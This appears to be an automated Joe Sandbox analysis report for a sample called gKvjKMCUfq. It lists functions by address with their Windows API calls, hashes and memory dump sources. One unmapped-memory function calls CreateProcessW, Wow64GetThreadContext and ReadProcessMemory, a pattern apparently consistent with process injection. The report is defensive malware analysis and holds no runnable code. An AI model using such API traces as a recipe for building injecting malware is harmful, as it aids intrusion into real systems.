Instruction ID: a709108d27f0ce0c2eee22203ee314bbe062f6d367e0f43ba8ce2068bbf67e89
Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction Fuzzy Hash: 333193B1704606AFDB08DF68D8D1D69B3A9FF48360715C629E519CB391EB38ED20CB90

Function 007747D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00774834

Part of subcall function 0079336C: __lock.LIBCMT ref: 00793372
Part of subcall function 0079336C: DecodePointer.KERNEL32(00000001,?,00774849,007C7C74), ref: 0079337E
Part of subcall function 0079336C: EncodePointer.KERNEL32(?,?,00774849,007C7C74), ref: 00793389

Part of subcall function 007748FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00774915
Part of subcall function 007748FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0077492A

Part of subcall function 00773B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B68
Part of subcall function 00773B3A: IsDebuggerPresent.KERNEL32 ref: 00773B7A
Part of subcall function 00773B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BEB
Part of subcall function 00773B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00773C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00774874

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 19cbb5fec26394969785139329e32ce0dbcb05a9832317e636e3f3b648edc7e5
Instruction ID: 7d6f1e857d43218d52a22c5404ab77e02e9d40f6b308eabd88e962e15ccd0e9f
Opcode Fuzzy Hash: 19cbb5fec26394969785139329e32ce0dbcb05a9832317e636e3f3b648edc7e5
Instruction Fuzzy Hash: A9119D71908705DBCB00EF29EC4991ABBE8FFC5790F10891EF454872B2DB749545CB96

Function 00790DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0079571C: __FF_MSGBANNER.LIBCMT ref: 00795733
Part of subcall function 0079571C: __NMSG_WRITE.LIBCMT ref: 0079573A
Part of subcall function 0079571C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,00000000,?,?,?,00790DD3,?), ref: 0079575F

std::exception::exception.LIBCMT ref: 00790DEC
__CxxThrowException@8.LIBCMT ref: 00790E01

Part of subcall function 0079859B: RaiseException.KERNEL32(?,?,?,00829E78,00000000,?,?,?,?,00790E06,?,00829E78,?,00000001), ref: 007985F0

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 0d6db415a0e9ee3455fddcf479e679f4a95bf1fe087eeb45919d4626b5dd6530
Instruction ID: 7e007484bd0538ff61ebe3d6973f10e289fd3278c4372a11b479dc6af3c67271
Opcode Fuzzy Hash: 0d6db415a0e9ee3455fddcf479e679f4a95bf1fe087eeb45919d4626b5dd6530
Instruction Fuzzy Hash: 4DF0813150021DAACF10BAE8FC099DE77A8EF01311F104429FD18D6691DFB99A9496D1

Function 007953A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

__lock_file.LIBCMT ref: 007953EB

Part of subcall function 00796C11: __lock.LIBCMT ref: 00796C34

__fclose_nolock.LIBCMT ref: 007953F6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f644e840a0ed2bb18706bad8f3150bbf01ccc0a8a1d5dd0a584e9b6220abd9ad
Instruction ID: 85ed9969a6cfee418ebdca011988249a3a7dab0a543b7e8011dd3d82e98626a3
Opcode Fuzzy Hash: f644e840a0ed2bb18706bad8f3150bbf01ccc0a8a1d5dd0a584e9b6220abd9ad
Instruction Fuzzy Hash: 16F0B471900A24DBDF52AF75B80A7AD77E06F42378F258208A424AB1C1CFFC99419B52

Function 0114DC6D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0114E42B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0114E4C1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0114E4E3

Memory Dump Source

Source File: 00000000.00000002.1720818394.000000000114C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0114C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114c000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: f2063ca978d9d80b545df528e759707ff89def042f0fadac587c409c343a3116
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: A512BD24E24658C6EB24DF64D8507DEB232FF68700F1090E9910DEB7A5E77A4E81CB5A

Function 00790C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00790CB7

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7b9079f42f989adcb481b6543e066d5545e1292a615d633a13c3a7e260cbe92c
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7E31B370A101059FCB18DF58E484AA9F7A6FB5A300B6487A5E80ACB355D735EDC1DBE0

Function 007AFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 007AFCB7

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 42e3411d4f5a0d9ed1e78b33f7562ec5dc0d61f39b8249f02fa58606bef11faf
Instruction ID: 28d893904235fd91abf7c99f4fd76afd2efa78eae4f50a0a5697066b0154b588
Opcode Fuzzy Hash: 42e3411d4f5a0d9ed1e78b33f7562ec5dc0d61f39b8249f02fa58606bef11faf
Instruction Fuzzy Hash: EB411674604341DFDB25DF24C458B1ABBE0BF85358F0989ACE8998B362C739E845CF92

Function 00777B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00777BB3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 133d0e29735d87c16305f8451d76efb291d24d1d08161734dd6e65c3796539f9
Instruction ID: 75b45cf2119f9b2b89941e96d9bdf7d74593d8ab95537c38a8baa81a81fc3ed2
Opcode Fuzzy Hash: 133d0e29735d87c16305f8451d76efb291d24d1d08161734dd6e65c3796539f9
Instruction Fuzzy Hash: 292178B2A04A08EBCF249F25E8417697BB4FF553A0F21C62EE48AC50A0EB3480D0D755

Function 00774DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00774BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00774BEF

Part of subcall function 0079525B: __wfsopen.LIBCMT ref: 00795266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774E0F

Part of subcall function 00774B6A: FreeLibrary.KERNEL32(00000000), ref: 00774BA4

Part of subcall function 00774C70: _memmove.LIBCMT ref: 00774CBA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: dcac9571cac1c9968206fe3f623f9b900008fc4bbe6854130157dcc25601d43a
Instruction ID: 5758749fc8d54972ac7f82bebada95a557685f9b251e2f7c06c9915c34a3c5f5
Opcode Fuzzy Hash: dcac9571cac1c9968206fe3f623f9b900008fc4bbe6854130157dcc25601d43a
Instruction Fuzzy Hash: FE11E732600205EBCF21AF74CC1AFAD77A4AF44790F10C429F54AA7191DFBD9D019751

Function 007AFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 007AFD91

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8a42c33f178f8d47531c326c2ce220f839dcf1e64bece4f0b760faf89b776b4f
Instruction ID: 279dc85374e506da371a9e829a6877b3b1e67264561a0c9ec9ce220caed167a3
Opcode Fuzzy Hash: 8a42c33f178f8d47531c326c2ce220f839dcf1e64bece4f0b760faf89b776b4f
Instruction Fuzzy Hash: CC2105B4608341EFDB25DF64C444B2ABBE1BF88354F05896CF98A57722D739E805CB92

Function 0079072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4fc6366d8fcf72684ebe6de8ef8102756bfe5bd03ae5de0aed79c05553b98d
Instruction ID: d6a51ecdc7a47841e6496f1c16091c4d9fc64abf096123023e0c58ed062ebbfc
Opcode Fuzzy Hash: 9e4fc6366d8fcf72684ebe6de8ef8102756bfe5bd03ae5de0aed79c05553b98d
Instruction Fuzzy Hash: 0901F5365152149FEF215AA8FC49AFAB3DDEFC0330F10846EE868D2850D6686C44CED1

Function 00794863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 007948A6

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: c26c56a28b80413d29ad4d0b7e812a2d39b47e21e000b8cc5b11e7d96bc19bb5
Instruction ID: d91bb0c3f1dffb4fcd7af1b7a96b51c5f9203e845e3c5a16ef2069103cda76cd
Opcode Fuzzy Hash: c26c56a28b80413d29ad4d0b7e812a2d39b47e21e000b8cc5b11e7d96bc19bb5
Instruction Fuzzy Hash: EEF0C271900649EBDF51AFB4EC0AFEE37A0AF02325F158514F4249A1D1CB7C9952DB52

Function 00774E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774E7E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 2e2fc6c0826eb7fe0c8c6a0993d4146a10cb120d4581623944f60ff7b8139555
Instruction ID: e9838af631e2fa8054e3883efb93d10a67403f0be6c9e791ced36668481553c8
Opcode Fuzzy Hash: 2e2fc6c0826eb7fe0c8c6a0993d4146a10cb120d4581623944f60ff7b8139555
Instruction Fuzzy Hash: AAF03971501711DFCF359F64E894822BBE1BF143B9320CA3EE1DA82620C7BA9840DF40

Function 00790791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007907B0

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d975e75f6586d4476992079e59d592908d13dfcff8e537183883acfbe07b8e58
Instruction ID: 11f3146e7a1029bbf5205178c0a202cfbc19b574c389d5d852f07fcfa85edc61
Opcode Fuzzy Hash: d975e75f6586d4476992079e59d592908d13dfcff8e537183883acfbe07b8e58
Instruction Fuzzy Hash: 61E0867690422857C72096589C09FEA779DDF896A0F0441B5FC0CD7214D964AC80C690

Function 0079525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00795266

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: dea7a27ba767690aee2f910aab1c5ad2b505cfbd17006e02c0de63cc9a28d3a4
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 5AB092B644020CB7CE022A82FC02A493B19AB41764F408020FB0C18262A677A6649A89

Function 0114EC70 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0114EC81

Memory Dump Source

Source File: 00000000.00000002.1720818394.000000000114C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0114C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114c000_gKvjKMCUfq.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 12912b847e0039c0ba2fa315bd4ce0c0634d394111c696451bd727748e9bf0dd
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 07E0E67494120DDFDB00EFB4D64969E7FB4FF04701F1001A1FD05D2281D7309D508A62

Non-executed Functions

Function 007FCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FCB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCB95
GetWindowLongW.USER32(?,000000F0), ref: 007FCBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCC00
SendMessageW.USER32 ref: 007FCC29
_wcsncpy.LIBCMT ref: 007FCC95
GetKeyState.USER32(00000011), ref: 007FCCB6
GetKeyState.USER32(00000009), ref: 007FCCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCCD9
GetKeyState.USER32(00000010), ref: 007FCCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCD0C
SendMessageW.USER32 ref: 007FCD33
SendMessageW.USER32(?,00001030,?,007FB348), ref: 007FCE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FCE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FCE60
SetCapture.USER32(?), ref: 007FCE69
ClientToScreen.USER32(?,?), ref: 007FCECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FCEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FCEF5
ReleaseCapture.USER32 ref: 007FCF00
GetCursorPos.USER32(?), ref: 007FCF3A
ScreenToClient.USER32(?,?), ref: 007FCF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 007FCFA3
SendMessageW.USER32 ref: 007FCFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD00E
SendMessageW.USER32 ref: 007FD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD06D
GetCursorPos.USER32(?), ref: 007FD08D
ScreenToClient.USER32(?,?), ref: 007FD09A
GetParent.USER32(?), ref: 007FD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD123
SendMessageW.USER32 ref: 007FD154
ClientToScreen.USER32(?,?), ref: 007FD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD20C
SendMessageW.USER32 ref: 007FD22F
ClientToScreen.USER32(?,?), ref: 007FD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD2B5

Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC

GetWindowLongW.USER32(?,000000F0), ref: 007FD351

Strings

@GUI_DRAGID, xrefs: 007FCE9C
F, xrefs: 007FD235

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: d2dcdcccf710d1ad39ccdfc114bbdcad7c7b5ff092b71e14fdb735e7716514f8
Instruction ID: 6d7ab9c73ec4b0717389827b9e49e879ecb67a8e3138d6e74d735e0641decd19
Opcode Fuzzy Hash: d2dcdcccf710d1ad39ccdfc114bbdcad7c7b5ff092b71e14fdb735e7716514f8
Instruction Fuzzy Hash: 89429C78204288EFDB22CF24C948ABABBE5FF49310F14492DF655C73A1CB399850DB56

Function 00786F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007871C3
_memset.LIBCMT ref: 00787539
_memmove.LIBCMT ref: 007876AC

Strings

_x, xrefs: 007C23CB
[:>:]], xrefs: 00787492
\b(?=\w), xrefs: 007C3769
[:<:]], xrefs: 00787479
\b(?<=\w), xrefs: 007C3773
Q\E, xrefs: 00787FCB
3cx, xrefs: 007C23A0
DEFINE, xrefs: 007C2103

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove$_memset
String ID: 3cx$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_x
API String ID: 1357608183-4024317189
Opcode ID: 9c796071f1709ccdfb37d6c47c1f3cf0d5909035c7f8d4c9ef7fba0d442ef50f
Instruction ID: 49dfc0d1aeb0d5b298248e355b13285f98480490f9cf4e28acac52a768611e7f
Opcode Fuzzy Hash: 9c796071f1709ccdfb37d6c47c1f3cf0d5909035c7f8d4c9ef7fba0d442ef50f
Instruction Fuzzy Hash: 2C93A375E44219DFDB24DF58C881BADB7B1FF48310F24816EE945AB281E7789E82CB50

Function 007748D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 007748DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007AD665
IsIconic.USER32(?), ref: 007AD66E
ShowWindow.USER32(?,00000009), ref: 007AD67B
SetForegroundWindow.USER32(?), ref: 007AD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007AD69B
GetCurrentThreadId.KERNEL32 ref: 007AD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 007AD6AE
